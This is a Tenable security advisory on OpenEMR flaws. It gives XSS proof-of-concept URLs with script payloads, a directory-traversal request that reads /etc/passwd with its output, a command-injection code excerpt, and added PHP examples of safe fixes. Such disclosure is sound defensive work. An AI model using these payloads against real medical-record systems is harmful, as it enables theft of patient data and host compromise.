Synopsis
Tenable researchers have discovered a number of flaws in OpenEMR - a popular, open-source medical records application. These flaws, detailed below, could allow attackers to obtain sensitive patient data or possibly execute arbitrary code on the host system.
XSS - controller.php - patient_id parameter - CVE-2019-3963
controller.php is vulnerable to a reflected cross-site scripting attack via the patient_id parameter. This could allow an attacker to execute arbitrary code in the context of the current user's session.
Proof of concept: http://<openemr host>/controller.php?document&clear_procedure_tag&patient_id=0"><script>alert("XSS")</script>&document_id=
XSS - controller.php - doc_id parameter - CVE-2019-3964
controller.php is vulnerable to a reflected cross-site scripting attack via the doc_id parameter. This could allow an attacker to execute arbitrary code in the context of the current user's session.
Proof of concept: http://<openemr host>/controller.php?document&view&patient_id=0&doc_id=0"><script>alert("XSS")</script>
XSS - controller.php - document_id parameter - CVE-2019-3965
controller.php is vulnerable to a reflected cross-site scripting attack via the document_id parameter. This could allow an attacker to execute arbitrary code in the context of the current user's session.
Proof of concept: http://<openemr host>/controller.php?document&clear_procedure_tag&patient_id=0&document_id=1"><script>alert("XSS")</script>
XSS - controller.php - foreign_id parameter - CVE-2019-3966
controller.php is vulnerable to a reflected cross-site scripting attack via the foreign_id parameter (POST request). This could allow an attacker to execute arbitrary code in the context of the current user's session.
Directory Traversal and Arbitrary File Download - Patient File Downloads - CVE-2019-3967
A vulnerability exists in the patient file download interface that allows authenticated users to download arbitrary files from the host system via a directory traversal in the form_filename parameter. This could allow an attacker to obtain sensitive patient information.
Proof of concept request:
POST /interface/patient_file/download_template.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/controller.php?document&upload&patient_id=0&parent_id=1&
Content-Type: application/x-www-form-urlencoded
Content-Length: 70
Connection: close
Cookie: OpenEMR=ac4ac95557810d61c49af51436209596
Upgrade-Insecure-Requests: 1

patient_id=0&form_filename=../../../../../../../../../../../etc/passwd
Response:
HTTP/1.1 200 OK
Date: Tue, 16 Apr 2019 15:00:22 GMT
Server: Apache/2.4.34 (Unix)
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Description: File Transfer
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename="passwd_Doe_2."
Content-Length: 1271
Connection: close
Content-Type: application/octet-stream

root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/bin/sh
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
postgres:x:70:70::/var/lib/postgresql:/bin/sh
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
apache:x:100:101:apache:/var/www:/sbin/nologin
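The traversal above succeeds because form_filename is joined to a directory without being confined to it. The following PHP is an added illustration of the defensive check, not OpenEMR's code or its patch; the templates directory name and the handler layout are assumptions.

```php
<?php
// Added example (not OpenEMR's code): confine a user-supplied template file
// name to a single directory before serving it. $templateDir is an assumed base
// directory; the real application's layout is not known from the advisory.
function resolveTemplatePath(string $templateDir, string $userFilename): ?string
{
    // First control: only a plain file name is acceptable. Separators, NUL bytes
    // and the "." / ".." components refuse "../../../../etc/passwd" outright.
    if ($userFilename === '' || $userFilename === '.' || $userFilename === '..'
        || strpbrk($userFilename, "/\\\0") !== false) {
        return null;
    }

    $base = realpath($templateDir);
    if ($base === false) {
        return null;
    }
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $userFilename);
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }

    // Second control: the resolved path must still start with the base directory
    // (catches a symlink inside the directory that points somewhere else).
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// Constructed usage in a download handler; the directory is an assumption.
$templateDir = __DIR__ . '/templates';
$requested   = $_POST['form_filename'] ?? '';
$path = resolveTemplatePath($templateDir, $requested);
if ($path === null) {
    http_response_code(400);
    exit('Invalid template name');
}
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
readfile($path);
```

Rejecting the name before touching the filesystem avoids leaking which paths exist through timing or error differences; the realpath prefix check stays in place as the backstop.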
Command Injection via /contrib/forms/scanned_notes/new.php - CVE-2019-3968
Unlike other uses of "exec" / "system" / "passthru" / etc. in the application, this form does not properly escape commands sent to the host OS, which allows command injection by an authenticated user who has access to the scanned notes form. $formid is taken directly from user input and passed, unsanitized, into the commands executed later in the script. This could allow an attacker to inject arbitrary commands to be executed on the host system.
$formid = $_GET['id'];
...
$imagepath = "$imagedir/${encounter}_$formid.jpg";
                                      ^____ user controlled value
...
$cmd = "convert -density 96 '$tmp_name' '$imagepath'";
                                          ^____ still contains user controlled value with no sanitization
...
$tmp0 = exec($cmd, $tmp1, $tmp2);
        ^___ command is executed
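The snippet above trusts $_GET['id'] all the way into exec(). The PHP below is an added example of how the same command can be built safely; it is not OpenEMR's fix. It reuses the variable names from the snippet and assumes $imagedir, $encounter and $tmp_name are set by the surrounding script as the advisory describes.

```php
<?php
// Added example, not OpenEMR's patch. Two independent controls: the form id is
// validated as a positive integer before it reaches any path, and every command
// argument goes through escapeshellarg() so the shell never interprets it.
function buildConvertCommand(string $rawId, string $imagedir, string $encounter, string $tmp_name): ?string
{
    // The form id is a database key: anything other than a non-empty run of
    // digits is rejected, so no quote or metacharacter can enter $imagepath.
    if ($rawId === '' || !ctype_digit($rawId)) {
        return null;
    }
    $formid = (int) $rawId;

    $imagepath = "$imagedir/{$encounter}_$formid.jpg";

    // Each argument is quoted individually. Even if $tmp_name or $encounter were
    // later influenced by a user, the shell would see them as literal strings.
    return 'convert -density 96 ' . escapeshellarg($tmp_name) . ' ' . escapeshellarg($imagepath);
}

// Constructed usage at the point where the original script calls exec().
$cmd = buildConvertCommand($_GET['id'] ?? '', $imagedir, $encounter, $tmp_name);
if ($cmd === null) {
    http_response_code(400);
    exit('Invalid form id');
}
$tmp0 = exec($cmd, $tmp1, $tmp2);
```

On PHP 7.4 and later, passing an array such as ['convert', '-density', '96', $tmp_name, $imagepath] to proc_open() runs the program without a shell at all, which removes the quoting problem entirely.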
Solution
Disclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]